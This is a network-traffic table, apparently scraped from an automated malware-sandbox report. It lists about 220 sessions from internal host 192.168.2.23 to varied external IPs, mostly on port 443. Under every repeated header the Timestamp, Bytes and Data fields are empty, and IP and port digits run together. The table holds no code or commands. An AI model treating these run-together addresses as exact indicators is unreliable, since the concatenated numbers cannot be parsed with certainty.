                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15464192.168.2.235257477.147.35.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15465192.168.2.23574721.17.252.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15466192.168.2.235956289.13.75.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15467192.168.2.2346360143.183.63.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15468192.168.2.2350672184.234.138.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15469192.168.2.2359158111.191.91.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15470192.168.2.2336162103.69.16.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15471192.168.2.233861031.162.120.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15472192.168.2.234907875.189.114.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15473192.168.2.2338572179.222.244.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15474192.168.2.2335976139.49.99.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15475192.168.2.2355280119.152.105.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15476192.168.2.233787050.230.53.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15477192.168.2.234204242.65.83.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15478192.168.2.2350892131.104.209.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15479192.168.2.234687227.93.253.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15480192.168.2.234812859.237.229.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15481192.168.2.2343562186.210.23.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15482192.168.2.235806027.42.30.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15483192.168.2.2341970162.149.165.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15484192.168.2.2335108110.146.254.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15485192.168.2.23337269.91.184.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15486192.168.2.2350224101.222.104.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15487192.168.2.2351014106.221.205.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15488192.168.2.2333940188.173.156.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15489192.168.2.2332768150.249.137.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15490192.168.2.2333268213.38.116.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15491192.168.2.233936213.41.76.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15492192.168.2.235179294.174.227.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15493192.168.2.2344520206.144.229.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15494192.168.2.236042242.9.162.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15495192.168.2.234446654.126.254.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15496192.168.2.236057464.8.34.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15497192.168.2.2336900143.39.82.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15498192.168.2.235230866.213.139.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15499192.168.2.2333218161.137.46.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15500192.168.2.2358250198.209.99.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15501192.168.2.23597585.22.219.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15502192.168.2.235903625.56.58.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15503192.168.2.2339020148.191.63.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15504192.168.2.2360966184.116.220.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15505192.168.2.2348348175.46.252.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15506192.168.2.2358552109.203.31.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15507192.168.2.2353012146.130.44.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15508192.168.2.233513264.187.176.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15509192.168.2.235854041.149.224.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15510192.168.2.234021218.174.29.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15511192.168.2.2351260158.113.105.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15512192.168.2.2350204169.60.234.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15513192.168.2.236086243.3.202.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15514192.168.2.2339638218.22.227.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15515192.168.2.234626046.244.220.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15516192.168.2.2346634212.104.114.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15517192.168.2.2345134182.92.218.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15518192.168.2.2357088187.177.66.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15519192.168.2.2342004157.213.110.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15520192.168.2.235392488.189.43.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15521192.168.2.2354812186.37.241.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15522192.168.2.235286061.120.171.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15523192.168.2.235696249.18.215.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15524192.168.2.2342404195.239.181.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15525192.168.2.233748288.192.225.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15526192.168.2.2338516177.3.178.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15527192.168.2.2344008183.81.235.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15528192.168.2.2356050101.213.78.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15529192.168.2.2345662100.8.100.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15530192.168.2.234890451.250.54.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15531192.168.2.2335892116.47.63.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15532192.168.2.235821612.8.111.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15533192.168.2.2333332161.124.188.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15534192.168.2.233868879.29.58.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15535192.168.2.2332958146.89.22.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15536192.168.2.235059651.155.54.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15537192.168.2.234596260.250.12.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15538192.168.2.234056283.134.65.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15539192.168.2.2357746101.87.73.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15540192.168.2.233511087.49.181.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15541192.168.2.2354070156.33.203.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15542192.168.2.2344732183.75.75.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15543192.168.2.2338678115.125.98.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15544192.168.2.2343000105.77.111.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15545192.168.2.2353994185.173.68.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15546192.168.2.233532496.103.103.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15547192.168.2.235843652.128.36.2538080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15548192.168.2.2336468107.154.169.1818080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15549192.168.2.234503614.87.207.1558080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15550192.168.2.234912092.229.50.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15551192.168.2.235622869.249.144.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15552192.168.2.2345976147.39.155.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15553192.168.2.2359878162.217.136.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15554192.168.2.233469077.59.240.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15555192.168.2.2342494145.190.52.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15556192.168.2.2339278134.13.135.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15557192.168.2.2349874223.112.112.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15558192.168.2.235972078.39.132.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15559192.168.2.2342402122.133.80.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15560192.168.2.235751257.192.44.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15561192.168.2.2357346167.21.159.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15562192.168.2.2344682173.148.191.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15563192.168.2.235086851.21.28.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15564192.168.2.2357296111.253.158.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15565192.168.2.233856446.66.156.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15566192.168.2.2340598204.71.58.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15567192.168.2.233476845.199.77.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15568192.168.2.233606224.226.73.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15569192.168.2.233696688.50.17.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15570192.168.2.2349732172.10.150.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15571192.168.2.2348308220.7.152.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15572192.168.2.235610267.200.165.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15573192.168.2.2355662121.200.117.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15574192.168.2.2349500210.160.216.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15575192.168.2.2348300156.144.125.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15576192.168.2.2354100208.147.205.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15577192.168.2.2355328113.12.167.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15578192.168.2.233931259.195.146.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15579192.168.2.235038241.74.172.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15580192.168.2.2347900217.4.252.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15581192.168.2.2352076222.194.254.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15582192.168.2.235821814.47.112.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15583192.168.2.2355656180.204.192.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15584192.168.2.236030469.123.11.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15585192.168.2.2357556217.195.209.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15586192.168.2.2359132162.33.99.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15587192.168.2.2348642103.248.106.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15588192.168.2.235275018.40.26.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15589192.168.2.2335178219.228.143.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15590192.168.2.2348752202.29.210.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15591192.168.2.234362054.229.119.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15592192.168.2.2338028156.38.38.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15593192.168.2.23351281.252.236.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15594192.168.2.2342852144.23.83.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15595192.168.2.233515663.40.233.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15596192.168.2.2335974199.99.63.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15597192.168.2.2347780183.208.51.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15598192.168.2.234623879.189.201.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15599192.168.2.233310286.131.87.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15600192.168.2.2359010101.203.178.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15601192.168.2.2356628159.150.228.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15602192.168.2.233875413.43.194.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15603192.168.2.23527064.234.97.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15604192.168.2.234374464.67.49.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15605192.168.2.2360558122.14.127.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15606192.168.2.2338488187.252.198.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15607192.168.2.2355518105.156.40.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15608192.168.2.2360876172.218.68.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15609192.168.2.2337744213.253.73.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15610192.168.2.235811031.235.118.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15611192.168.2.23555285.121.181.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15612192.168.2.2350034131.111.189.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15613192.168.2.235960673.19.7.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15614192.168.2.235444068.74.223.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15615192.168.2.2357592153.65.239.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15616192.168.2.2351396198.187.236.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15617192.168.2.235613460.201.14.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15618192.168.2.2346266130.254.33.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15619192.168.2.2346078171.63.57.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15620192.168.2.2339398135.139.175.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15621192.168.2.2356062196.132.12.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15622192.168.2.234785243.245.23.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15623192.168.2.2339010197.163.89.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15624192.168.2.2335586202.159.111.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15625192.168.2.234595062.69.180.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15626192.168.2.2339230197.12.37.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15627192.168.2.2340804173.255.233.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15628192.168.2.2347394216.146.241.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15629192.168.2.2340556189.118.107.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15630192.168.2.2352720148.86.108.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15631192.168.2.2358810113.191.88.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15632192.168.2.2334014218.19.176.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15633192.168.2.235634276.23.195.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15634192.168.2.233421860.148.219.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15635192.168.2.234609814.235.17.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15636192.168.2.2337376150.128.35.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15637192.168.2.235750664.195.202.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15638192.168.2.234757692.48.103.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15639192.168.2.2343712115.57.182.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15640192.168.2.234577631.53.134.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15641192.168.2.234042059.19.101.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15642192.168.2.2341820116.179.138.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15643192.168.2.2354902189.163.125.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15644192.168.2.234928075.73.222.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15645192.168.2.2334350134.191.23.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15646192.168.2.2341660103.150.59.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15647192.168.2.2341576146.0.10.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15648192.168.2.235828846.91.254.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15649192.168.2.234292266.178.246.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15650192.168.2.2355824148.73.102.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15651192.168.2.235773471.241.49.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15652192.168.2.2352212172.122.247.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15653192.168.2.2357026204.211.225.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15654192.168.2.2358620141.32.36.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15655192.168.2.2336410208.44.216.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15656192.168.2.2360746157.47.106.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15657192.168.2.235473444.98.79.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15658192.168.2.2359842130.178.134.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15659192.168.2.23469062.116.212.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15660192.168.2.233816287.69.194.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15661192.168.2.2335130176.25.126.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15662192.168.2.2335198219.178.236.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15663192.168.2.2356162203.45.43.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15664192.168.2.2360594132.236.72.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15665192.168.2.2335822178.125.189.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15666192.168.2.2343790141.50.210.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15667192.168.2.234891419.40.229.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15668192.168.2.235716857.119.75.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15669192.168.2.2353078140.102.26.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15670192.168.2.2342596217.192.85.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15671192.168.2.2354332130.211.90.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15672192.168.2.2360782143.102.227.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15673192.168.2.2337988158.225.251.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15674192.168.2.2337872221.79.170.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15675192.168.2.2360322223.216.154.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15676192.168.2.235535657.66.108.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15677192.168.2.2342674189.9.36.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15678192.168.2.2344486156.49.100.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15679192.168.2.2355876138.130.36.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15680192.168.2.2333168138.162.249.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15681192.168.2.2345686192.178.84.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15682192.168.2.23501584.8.178.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15683192.168.2.2332946168.11.212.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            15684192.168.2.2355068190.237.87.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
